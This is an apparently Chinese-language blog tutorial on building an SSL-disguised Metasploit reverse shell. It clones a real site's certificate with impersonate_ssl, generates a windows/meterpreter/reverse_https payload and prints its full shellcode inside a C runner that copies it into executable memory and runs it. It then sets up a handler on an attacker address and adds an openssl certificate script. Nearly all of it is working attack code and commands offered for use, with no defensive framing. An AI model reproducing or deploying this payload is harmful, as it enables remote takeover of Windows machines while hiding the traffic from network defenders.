Metasploit 生成帶SSL加密載荷
阿新 • • 發佈:2021-06-29
1.下載證書。Impersonate_SSL模組,下載指定網站的證書。
msf6> use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set rhost www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run
得到:/root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
2.生成帶有ssl證書的shellcode程式碼。
msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https msf payload(reverse_https) > set STAGERVERIFYSSLCERT true msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem msf payload(reverse_https) > set LHOST 192.168.140.128 msf payload(reverse_https) > set LPORT 8443 msf6 payload > generate -f c -o /root/shell.c
3.開啟生成檔案,然後加入到shellcode執行盒中。
#include <Windows.h> #include <stdio.h> #pragma comment(linker, "/section:.data,RWE") unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49" "\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78" "\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3" "\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac" "\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24" "\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c" "\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59" "\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d" "\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26" "\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00" "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69" "\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54" "\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a" "\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b" "\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53" "\x68\xfb\x20\x00\x00\xe8\x6a\x01\x00\x00\x2f\x72\x6a\x5f\x79" "\x6d\x73\x34\x4b\x4f\x74\x6d\x72\x59\x61\x70\x67\x79\x37\x73" "\x50\x52\x41\x4f\x65\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32" "\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58" "\x68\x55\x41\x33\x54\x62\x43\x32\x6a\x70\x5a\x43\x49\x5f\x64" "\x47\x65\x32\x70\x54\x69\x5a\x63\x79\x76\x68\x53\x6a\x5f\x37" "\x51\x58\x5f\x73\x68\x33\x62\x67\x44\x36\x6a\x66\x69\x32\x46" "\x55\x63\x4a\x65\x6a\x70\x4d\x74\x56\x53\x51\x67\x6f\x30\x67" "\x48\x4a\x46\x4a\x6c\x36\x54\x52\x33\x78\x55\x6c\x6f\x44\x70" "\x62\x36\x5a\x31\x68\x34\x32\x4a\x37\x6d\x35\x50\x5f\x54\x79" "\x67\x44\x4d\x41\x4f\x71\x6e\x65\x52\x48\x39\x35\x53\x5a\x4c" "\x54\x66\x57\x58\x74\x45\x4a\x38\x75\x6d\x2d\x4e\x55\x62\x6f" "\x78\x66\x59\x58\x55\x34\x46\x76\x62\x48\x59\x35\x30\x6c\x6b" "\x4f\x67\x48\x42\x43\x39\x4a\x4b\x41\x75\x38\x41\x6c\x37\x69" "\x39\x51\x76\x4e\x30\x65\x6d\x37\x54\x70\x43\x5a\x65\x6b\x4b" "\x72\x4b\x4f\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53" "\x68\x00\x32\xe8\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e" "\x3b\xff\xd5\x96\x6a\x0a\x5f\x68\x80\x33\x00\x00\x89\xe0\x6a" "\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x53\x53\x53" "\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88" "\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xcd\xe8\x4c" "\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" "\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68" "\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0" "\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x6b" "\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x30\x2e" "\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; typedef void(__stdcall* CODE) (); int main() { //((void(*)(void))&buf)(); PVOID pFunction = NULL; pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(pFunction, buf, sizeof(buf)); CODE StartShell = (CODE)pFunction; StartShell(); }
4.建立偵聽
use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_https msf exploit(handler) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem msf exploit(handler) > set STAGERVERIFYSSLCERT true msf exploit(handler) > set LPORT 8443 msf exploit(handler) > set LHOST 192.168.140.128 msf exploit(handler) > run -j
確保網站可以開啟。
執行後即可上線。
如果需要自己製作證書,則可以使用,指令碼生成。
#!/bin/bash
clear
read -p "Password:" PASS
echo "建立AES256加密金鑰..."
openssl genrsa -passout pass:${PASS} -out rsa_aes_private.pem 2048
echo "生成公鑰..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -pubout -out rsa_public.pem
echo "PEM私鑰轉DER..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -out rsa_private_key.der -outform der
echo "PEM公鑰轉DER..."
openssl rsa -in rsa_public.pem -out rsa_public_key.der -pubin -outform der
echo "Finish!"